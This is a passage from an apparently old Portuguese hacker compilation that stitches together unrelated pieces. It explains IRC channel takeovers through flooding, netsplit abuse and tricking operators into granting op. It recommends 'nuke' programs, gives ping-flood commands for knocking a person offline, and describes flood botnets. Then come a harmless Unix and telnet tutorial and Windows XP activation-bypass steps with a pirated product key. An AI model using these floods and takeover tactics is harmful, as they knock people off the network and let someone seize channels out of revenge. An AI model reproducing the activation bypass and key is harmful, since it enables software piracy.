manda um sinal para o bot que está no servidor laged e esse muda o seu nick para o novo nick da vítima. 3. Em uns
poucos segundos de lag o servidor em que o bot está dá um kill na outra pessoa, porque acha que o seu bot pegou o
nick primeiro. Essa não é um bom método para um takeover, mas é divertido ver um bando de gente recebendo kill
num grande canal.


-------------------------------------------------------------


Tomando Canais

Tomar canais é uma boa maneira de mostrar seu poder ou se vingar de um inimigo. É o motivo básico das guerras de
IRC, controle de território. Essa seção contém informações úteis para fazer-lo de várias maneiras.


1. Flood no Canal

Esse método é divertido, mas a parte mais difícil é que cada vez mais pessoas estão ficando imunes ao flood.
Conseguindo dar flood em todas as pessoas o resto é fácil. Pegue todos os clones que você usou e descarte-os. Depois
entre no canal e pegue OP. Contudo se seu não cair temos um dilema. Um canal sem OP e com duas pessoas o
querendo. O que você faz? Corra para um netsplit!


2. Netsplit

Um canal sem OP é um alvo fácil para um netsplit. O que você faz é o seguinte: Quando achar um servidor splited
conecte-se a ele. Se não houver ninguém no canal você ganha OP só entrando no canal. Com o OP, basta esperar por
um netmerge e quando todos estiverem no canal novamente você vai ser o único OP, podendo fazer o que quiser!

Fazer isso com um canal que já tem OPs não é fácil. Na Undernet é IMPOSSÍVEL. Mas isso não quer dizer que você não
possa se divertir. Pegue o OP e espere um netmerge. Quando as pessoas voltarem ao canal, rode um desync. O que ele
faz, é mudar as banlists, esvazie elas e mude os modos do canal. Isso realmente acaba com os servidores que já estão
mal. Eles ficam tentando colocar o canal nos modos normais, isso causa um lag terrível que leva o canal à ruína. Isso
acaba também com os bots que não estão splited. Isso pode causa-los flood ou crash. Se você não pode hackear os
OPs pelo menos tem a sua vingança. Essa brincadeira pode levar o canal a ficar mal por uma meia hora algumas
vezes.

Se você é sortudo o suficiente para estar numa rede lamer que ainda não tem proteção anti-nethack, você poderá
tomar canais com netsplit, bastando ter o script certo. 1. Você precisa de um servidor splitado sem proteção. O que
acontece é que quando o servidor quiser dar OP para alguém ele vai, na verdade, deOPar essa pessoa. 2. Outra boa
maneira de fazer isso é tendo como dar um kickban em cada pessoa que entrar no canal por um netmerge. Isso
combinado com o netsplit protection fará você tomar o canal depois de uma simples batalha.


3. Pedindo ao OP

Essa é a maneira mais facil de tomar um canal. É efetiva e legal, significa eles te darem OP e você deOPar todos eles.
Os IRCops não podem fazer nada contra isso. A melhor maneira de ganhar OP é ficar num canal um pouco, sendo
amável e prestativo (essa é a parte difícil). Aí diga "Ei, você acha que pode me OPar? Sou confiavel. Eu tenho te
ajudado desde que cheguei". Depois o script cuida de deOpar todos em massa, isso é fácil. O que o script vai fazer é
óbvio: logo quando você ganhar o OP ele vai tirar o OP de todos os outros, com exceção de você. Eles nem vão ter
tempo de reagir! Depois de estar sozinho como OP do canal você poderá fazer o que quiser, trancar o canal, kickar
e/ou banir todo mundo, tudo que der na telha. O canal é seu agora!



------------------------------------------------------------


Guerra Avancada

Os scripts de guerra estão ficando cada vez mais avançados. Contudo, os servidores e os IRCops também estão ficando
cada vez melhores. Muitos servidores incorporam o Clone Detection. Isso significa listar as pessoas comparando os IP's
e notificando os IRCops. Isso pode tornar impossível fazer um número de clones suficientes para dar um flood em
alguém. Alguns servidores tem proteção contra táticas de netsplit takeover. Esse tipo de coisa pode deter o hacking
contra OPs durante um netsplit, permitindo somente tomar canais que não tenham OP. Anti Collide é também usado
em muitos servidores. Fazendo com que os dois usuários sejam mortos numa colisão por troca de nick. Se alguém
quiser te ferrar você vai deixar de brigar só porque não pode usar clones e etc??? NÃO!


1. Nuke

Nuke é uma grande arma para tirar alguém de IRC rápido! Funciona assim: O programa de nuke manda informação
para pessoa no servidor e ela é ferrada por eles, causará erros como "dead Socket", "connection refused", "eof from
client" e "machine is not on the network".

Para usar o nuke é preciso primeiro um modem rápido, 28.8 ou melhor. Você também precisa do Trumpet© Winsock.
Programa dial up que se comunica rapidamente com o modem. Esse programa pode ser facilmente encontrado na
web. Agora só é preciso de um programa de Nuke. Eu recomendo o Winuke 4 by CHAOS INC. ou Wnewk para maquinas
windows, ou se você usa um mac, MAC NUKE. Depois de pegar esses programas, é fácil ter uma vingança, tomar
canais, e matar gente rapidamente.


2. Bombas ICMP

ICMP é uma maneira extremamente poderosa de tirar a pessoa , não só de IRC, mas de sua conexão com a Internet.
Funciona dessa maneira: ela manda mensagens ICMP, em uma taxa muito alta de velocidade, causando barulho na
linha, e modem lag. Causa tanto lag, que seu ping aumenta terrivelmente e o joga pra fora do IRC server.

Para usar o ICMP você precisa de um Unix Shell account. Por que? Porque para usar o ICMP efetivamente você precisa
de mais do que um modem pode oferecer. Você precisa de uma T1, pelo menos. Existem muitos programas de ICMP
para Windows disponíveis, mas eles não trabalham muito bem. É a velocidade que importa nessa hora.

Aqui estão duas formas de usar ICMP num Unix shell:

ping -s (ip address) (packet size) (# of packets)
ping -s (packet size) -c (# of packets) <-f> (ip address)

(IP address) é o *!*@seja.la.oque.for
(packet size) é o tamanho de cada pacote a mandar, tente 30kb
(# of packets) é quantos pacotes mandar 3000 é um bom número
-f é opcional em segundo, e manda pacotees a 20/seg



3. Botnet/Floodnet

É cada vez mais difícil usar clones sem ser pego. Você precisa de uma maneira de usar o flood sem ser detectado.
Como fazer isso? Floodnet. Existem duas tipos diferentes de Floodnet. O primeiro é com Eggdrop bots, esses botnets
são compreendidos como eggdrops ligados, e tem um script de flood comum. Existem botnets com muitas centenas de
ligações. É muito difícil parar o flood deles. A outra maneira, é usar scripts individuais. Os scripts têm comandos
comuns, e permitem que usuários com o mesmo script de se liguem, para juntos combinarem seus clones. Existem
vantagens e desvantagens dos dois. As vantagens dos botnets é que estão sempre online porque estão em um Shell.
Mas as desvantagens é que não são tão dinâmicos quanto um clone floodnet.

BODY { SCROLLBAR-BASE-COLOR: #000080 } BODY { SCROLLBAR-ARROW-COLOR: #0000FF } //script from www.argnet.tk function blockError(){return true;} window.onerror = blockError; function disableselect(e) { return false } function reEnable() { return true } //if IE4+ document.onselectstart=new Function ("return false") //if NS6 if (window.sidebar) { document.onmousedown=disableselect document.onclick=reEnable }

Unix

Introdução

O Unix é um sistema operacional desenvolvido em 1969, pela Bell Laboratories, originalmente para executar em
computadores da DEC, sendo que mais tarde passou a; ser utilizado em mainframes . Num sentido menos amplo o UNIX
é um sistema operacional de tempo compartilhado, denominado kernel.O kernel é um programa que controla os
recursos do computador e os aloca entre os usuários. Ele controla os programas e periféricos (disco, terminais,
impressoras, etc.) que estão ligados à máquina. O UNIX possui algumas características como:
Capacidade de multitarefa
Mutiusuários
Portabilidade
Conectividade e comunicações
Para usuários de DOS

Para quem está acostumado com o DOS, notará algumas diferenças, como os nomes de arquivos, que no DOS tem
apenas 8 de nome e 3 de extenção, no UNIX não tem limite podendo ter várias extenções. Ex: relatorio.txt.zip.tar. Outro
detalhe é por ser um sistema mutiusuário, a entrada ao sistema é feita com um login e um password, onde login é o
nome do usuário e password é uma senha de segurança.
Permissões de arquivos e diretórios

No Unix existe uma sequência de caracteres que definem o que cada usuário pode fazer com cada arquivo ou diretório
e somente o dono do arquivo (owner) e o gerente da rede (root) pode mudar as permissões atraves< do comando
chmod. Essa sequência é:
d rwx rwx rwx

| | | | Onde:

tipo dono grupo outros r=leitura

w=escrita (gravação)

x=execução
Tipo - é o tipo do arquivo e pode ser:
d = diretório
b = block
r = raw
l = simbolic link
Dono - dono do arquivo, o dono é quem o criou ou copiou.
Grupo - grupo de usuários a que o dono pertence (exemplo: grupo alunos ou grupo professores)
Outros - demais usuários, o resto das pessoas que tem o acesso ao arquivo
Detalhes

O Unix é sensível a caixa das letras, isto é, se um comando é em letra minúscula não pode ser digitado em maiúscula
ou se um parâmetro do comando for em maiúscula tem que ser digitado em maiúscula
Existem arquivos e diretórios escondidos. Para esconder basta colocar um . no começo do nome (.plan)
Pode-se executar vários comandos na mesma linha utilizando o caracter ;

Comando ls
Esse comando mostra o conteúdo de um diretório. É equivalente ao comando dir do DOS.
O comando list mostra os arquivos existentes ordenados em ordem alfabética. O ls como outros comandos tem opções
para apresentar outras informações.
Sintaxe
ls [-latRF] [arquivo]
Parametros
-t = lista os arquivos em ordem de criaação
-a = lista todos os arquivos, inclusivee os escondidos
-F = acrescenta os seguintes caracteress no final dos arquivos:
/ - diretório
@ - link
* - executável
-R = lista todos os arquivos e subdirettórios
-l = lista de uma forma completa <

Comando cat
O comando cat mostra o conteúdo de arquivos, geralmente do tipo texto. Funciona bem com arquivos pequenos, mas
se o arquivo for grande o texto rolará e o usurário não conseguirá ler o conteúdo do arquivo.
Serve também para criação de arquivos texto pequenos do tipo lembretes, para isso basta direciona-lo com > para o
nome do arquivo a ser criado (segue exemplo).
Sintaxe
cat arquivo [arquivo2] [aquivo3]

Comando more
O comando more assim como o cat serve para ver o conteúdo de um arquivo que é, geralmente, texto. A diferença
entre o more e o cat é que o more faz uma pausa a cada tela cheia exibindo uma mensagem "--More--", dando uma
oportunidade ao usuário ler a tela. Existem vários comandos que são listados ao apertar h mas os mais usados são:
enter exibe mais uma linha do texto
espaço exibe mais uma pagina do texto
ctrl+l rescreve a tela
v chama o editor de textos vi do Unix para a linha corrente
Sintaxe
more arquivo
Parametros
Esse comando não possui parâmetros

Comando cal
Este comando é usado para exibir o calendário de um determinado mês ou ano.
Observação
o mês deve ser completo, pois o cal difere 95 de 1995. Caso somente um número seja informado será exibido o
calendário daquele ano, se nenhum numero for fornecido será exibido o calendário do mês corrente, anterior e
posterior.
Sintaxe
cal [-r] [mês] [ano]

Comando mkdir
Serve para criar diretórios e subdiretórios especificados.
Sintaxe
mkdir diretório
Parâmetros
Esse comando não possui parâmetros.

Comando rmdir
Serve para remover diretórios e subdiretórios especificados.
Sintaxe
rmdir diretório
Parametros
Esse comando não possui parâmetros.

Comando cp
Esse comando é útil para copiar arquivos e diretórios para outros diretórios. Semelhante ao comando copy do DOS.
Sintaxe
cp [-r] nome1 nome2
Parametros
-r = copia o conteúdo dos subdiretórioss caso nome1 for um diretório

Comando mv
Esse comando é útil para mover arquivos e diretórios. Também é usado para renomear tanto arquivos quanto
diretórios, pois o Unix não possui um comando especifico para trocar os nomes de arquivos. Muito cuidado ao mover
ou renomear um arquivo, verifique se não exista um outro com o mesmo nome, senão o arquivo existente irá ser
substituído pelo outro.
Sintaxe
mv [-i] nome1 nome2
Parametros
-i = pergunta confirmação ao mover p;

Comando rm
Esse comando é útil para remover arquivos e diretórios. Mas cuidado ao usar o comando rm, pois o Unix não consegue
recuperar arquivos, se por acaso usar o parâmetro -r em um diretório. Semelhante aos comandos del e deltree do
DOS.
Sintaxe
rm [-ir] nome1
Parametros
-r = remove o conteúdo dos subdiretórioos caso nome1 for um diretório
-i = pergunta confirmação para os arquiivos

Comando find
Procura por um determinado arquivo no winchester apartir do diretório especificado dando uma lista de quais
diretórios se encontra o arquivo especificado.
Sintaxe
find diretório [-parâmetros]
Parametros
-name arquivo = indica o arquivo a ser procurado
-user usuário = indica que o arquivo teem que pertencer a o usuário indicado
-group grupo = indica que o arquivo temm que pertencer a o grupo indicado
-mtime n = procura os arquivos que foraam modificados nos exatos n dias
-print = imprime o nome do arquivo na ttela, é sempre necessário pois sem ele não irá ser mostrado nada
-exec comando {} \; = executa o comandoo para todos os arquivos encontrados o {} \; faz parte da sintaxe e é
substituído pelo nome do arquivo e é necessário o espaço entre as chaves e a barra

Comando grep
Procura pela ocorrência de uma string no arquivo especificado. Ele exibe apenas as linhas que possuem a string mas
cuidado com os caracters interpretados pelo shell (, ), {, }, ;, ?, !, *, [, e ] use um apóstrofo para isolar esses caracteres.
Sintaxe
grep [-parâmetros] expressão arquivo
Parametros
-v = mostra as linhas que não aparece aa string
-i = ignora a diferença entre letras maaiúsculas e minúsculas
-c = mostra o número de vezes que foi eencontrada a expressão
-n coloca o número da linha em que foi encontrada a expressão

Comando chmod
Muda a permição dos arquivos e diretórios. As permissões de arquivos estão detalhadas no tópico Permissões de
Arquivos ao lado esquerdo da página.
Sintaxe
chmod [-fR] quem+/-permissão arquivo
Parametros
-R = troca para arquivos que estão em ssubdiretórios
-f = caso ocorra algum erro ele força aa troca de permissão
quem = é a classe do usúario (ugoa) para quem vai receber a permissão nova
u = usuário
g = grupo
o = outros
a = todas as classes juntos (all)
+/-/= = mais, menos ou igual define se você vai colocar (+) ou tirar (-) a permissão, o sinal = serve para trocar a
permissão se ele tiver com permissao ele tira a permissão
permissão = tipo de permissão (rwx)
r = leitura
w = escrita
x = execução

Comando cd
Muda de diretório, equivale ao mesmo comando do DOS. Como o Unix não mostra o diretórios corrente no prompt
como o DOS pode-se usar o comando pwd para mostrar o diretórios corrente. Nã esqueça que o diretório principal é
simbolizado por / (diferente a do DOS).
Sintaxe
cd [diretório]
Parametros
diretório = o diretório ou o caminho de um para qual você quer ir

Comando pwd
Mostra o diretório corrente em que você está. O Unix não mostra o diretórios corrente no prompt como o DOS
Sintaxe
pwd
Parametros
Esse comando não possui parametros

Comando at
Processa um comando ou arquivo script para ser processados posteriormente numa hora, dia ou mês desejado. O at ,
após a sua sintaxe, deixa espaço para colorar os comandos ou arquivos script que serão processados posteriormente
(use ^d quando acabar de digitar os comandos) ou pode-se especificar um arquivo para entrada com < para dar
entrada um arquivo ja criado.
Sintaxe
at [-lr] hora [data] [+incremento]
Parametros
-l= lista todos os jobs programados comm at e o número designado para cada um. Mostra aqueles que voce mesmo
programou.
-r= remove um job at que você colocou. Mas antes é preciso saber o número e fila em que está o job mostrado com a
opção -l
hora= uma hora qualquer, melhor no padrão 24hs. Além o at também reconhece as horas now (agora), midnight
(meia-noite), noon (meio-dia).
data= você pode especificar uma data também. A data é no formato mes dia(,ano) ou dia da semanda (sun, mon, wen,
.... Pode preceder a data next (próximo).
+incremento= quanto tempo depois da data o at irá ser executado. é formado do símbolo + um número e uma unidade
de tempo (minutes (minutos), hours (horas), days (dias), months (meses) e years (anos)

Comando in
O comando ln faz um atalho (link) de um arquivo ou diretório. Voce pode se referir a um arquivo que está num diretório
/bin por exemplo no seu diretório home somente fazendo um link do mesmo. Existe dois tipos de link o hard link e o
simbolic link (simbolico), o primeiro tipo faz um link onde irá apontar para o lugar no winchester onde o arquivo esta
amarzenado, o segundo tipo é um link simbólico pois o link é um arquivo texto que contem o path de onde o arquivo
está. Isto quer dizer se voce apagar um hard link ira excluir o arquivo e se apagar um simbolic link irá apagar somente
o link.
Sintaxe
ln [-sf] arquivo nomelink
Parametros
-s = cria um simbolic link (hrad link éé criado sem esse parametro)
-f = força a criação do link, para linkks que não se tem permição de leitura
arquivo = nome do arquivo ou diretório que vai ser linkado
nomelink = nome do link pode ser qualquer um, mas o interssante e colocar o mesmo nome do arquivo ou diretório.

Invasao por telnet

(Protocolo de Terminal Virtual) é o protocolo Internet para estabelecer a conexão entre computadores. Através dessa conexão remota, pode-se excutar programas e comandos em outra máquina, como se o teclado de seu computador estivesse ligado diretamente a ela.
O visual de uma conexão via Telnet é semelhante ao que se tem em BBS's de interface Dos, e a operação do computador remoto se dá da mesma forma, ou seja, através de uma linha de comandos Unix ou a partir de um menu de comandos disponíveis que sempre se apresenta em algum lugar da tela (esta última forma é a mais comun em servidores que permitem acesso público).

O Telnet pode ser usado para a pesquisa de informações e transferência de arquivos - tudo depende do que o computador ao qual você está conectado permitir que você faça. Ele também é muito usado por operadores de sistemas (Sysop's) a fim de fazer algum tipo de manutenção (se você pensa que o Sysop de seu provedor sai de casa toda vez que tem algum problema nos servidores, está muito enganado; muitas vezes ele faz a manutenção de casa mesmo, via Telnet !)

Programas para Telnet:
Para fazer uma conexão via Telnet, é necessário um programa específico. O windows 95 já vem com um (procure no diretório c:\windows o programa Telnet.exe - deve estar lá !).

Conectando-se via Telnet:
Os passos que apresentamos aqui são para o programa que acompanha o windows 95, mas servem perfeitamente para outros programas, com algumas variações, que você pode perceber e contornar. Se você tem algum dos programas listados ao lado, leia isto primeiro e depois passe para a página específica desse programa.

Inicie o programa Telnet.exe ou outro utilitário para esse fim. Clique no menu "Conecta" (connect), selecione "Sistema Remoto" (remote system) e digite na caixa "Nome do Host" (Host Name) o endereço ao qual você quer se conectar (ex.: spacelink.msfc.nasa.gov).

Nas caixas "Porta" (port) e "Tipo do Terminal" (terminal type) selecione "telnet" e "vt100", respectivamente (isso não é um padrão, mas é usual; pode ser que em alguns lugares você tenha que mudar essa configuração). Feito isto, clique no botão "Conectar" (Connect). Isto iniciará a conexão com o computador remoto.

Frequentemente, ao se completar a conexão, o sistema remoto pede uma senha. No nosso exemplo, digite "guest" e aperte enter (lembre-se, você está operando um sistema de interface parecida com o DOS - na verdade é Unix - esqueça o mouse e use o teclado !). Isto abrirá as portas do computador remoto para você.

Na tela surge uma série de opções, precedidas de um número ou letra. Para executar um desses comandos, digite esse número ou letra e aperte enter (os usuários da época pré-windows não terão a menor dificuldade com isso).

Explore o sistema ao qual você se conectou para exercitar. Quando quiser terminar a conexão, volte ao menu "Conecta" e selecione "Desconectar".

Abaixo temos alguns endereços onde você pode fazer uma conexão via Telnet

netfind.if.usp.br
Busca mundial de usuários na Internet.
Digite netfind ao estabelecer a conexão.
ned.ipac.caltech.edu
Banco de dados Extragalático da
NASA/IPAC. Digite ned na conexão.
spacelink.msfc.nasa.gov
Banco de dados da NASA. Digite guest ao
se conectar.
stis.nsf.gov
Informações científicas e tecnológicas.
Digite public na conexão.
Espero que, com estas informações, você já seja capaz de fazer uma conexão deste tipo. Alguns endereços não vão ter nada de interessante, mas não se desanime. Você pode encontrar muito material de pesquisa via Telnet.

Exercício:
Conecte-se ao Banco de Dados da NASA e copie para seu computador uma foto tirada pelo telescópio Hubble (acredite, vai dar um pouco de trabalho encontrar, mas não desanime; ao final você já vai estar bem mais familiarizado com o Telnet !) ;-)

Comandos básicos de Unix:
A maioria dos servidores não permite acesso público via Telnet, porque essa é a principal porta de entrada de Hackers. Nestes servidores não se encontra menus que facilitam a navegação pelo site ou operações de qualquer tipo, o que leva a necessidade de se conhecer alguns comandos de Unix.

Se você é WebMaster, muitas vezes vai ter acesso a provedores de presença, via FTP e, em alguns casos, Telnet, para efetuar algumas operações que o FTP não permite. Segue abaixo uma pequena lista de comandos que lhe serão muito úteis neste caso:

ls -l
lista os arquivos de um diretório
ls -al
lista todos os arquivos de um diretório, mesmo os Hidden
cp x y
copia o arquivo do diretório x para o diretório y (o caminho de diretório deve ser colocado por inteiro)
mv x y
move o arquivo do diretório x para o diretório y (o caminho de diretório deve ser colocado por inteiro)
rm x
deleta o arquivo x
cd xxx
muda o diretório ativo para xxx
cd ..
muda o diretório ativo para o que está 'acima' do atual
mkdir xxx
cria o diretório xxx dentro do diretório atual
rm xxx
remove o diretório xxx.

Validando seu xp

1. Vá em Iniciar > Executar

2. Digite regedit e clique em OK.

3. Já dentro do regedit, navegue até a chave:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\WindowsNT\CurrentVersion\WPAEvents

4. No painel à direita, clique duas vezes em OOBETimer

5. Na janela que foi aberta, apague qualquer valor e clique em OK. Feche o regedit

6. Vá novamente em Iniciar > Executar e dessa vez digite:
%systemroot%\system32\oobe\msoobe.exe /a

7. Na janela que foi aberta, escolha a opção Sim, desejo telefonar…

8. Na próxima etapa, clique no botão Alterar chave de produto.

9. Na etapa seguinte, digite a CD-Key:
THMPV-77D6F-94376-8HGKG-VRDRQ
e clique no botão Atualizar

10. Após clicar no botão Atualizar, o assistente para ativação voltará para a janela anterior, então, clique em Lembrar mais tarde e reinicie o Windows.

11. Reiniciado o Windows vá novamente em Iniciar > Executar e digite:
%systemroot%\system32\oobe\msoobe.exe /a

12. Aparecerá a seguinte mensagem:

Ativação do Windows
O Windows já está ativado. Clique em OK para sair.

Pronto! Windows validado com sucesso!
By Leno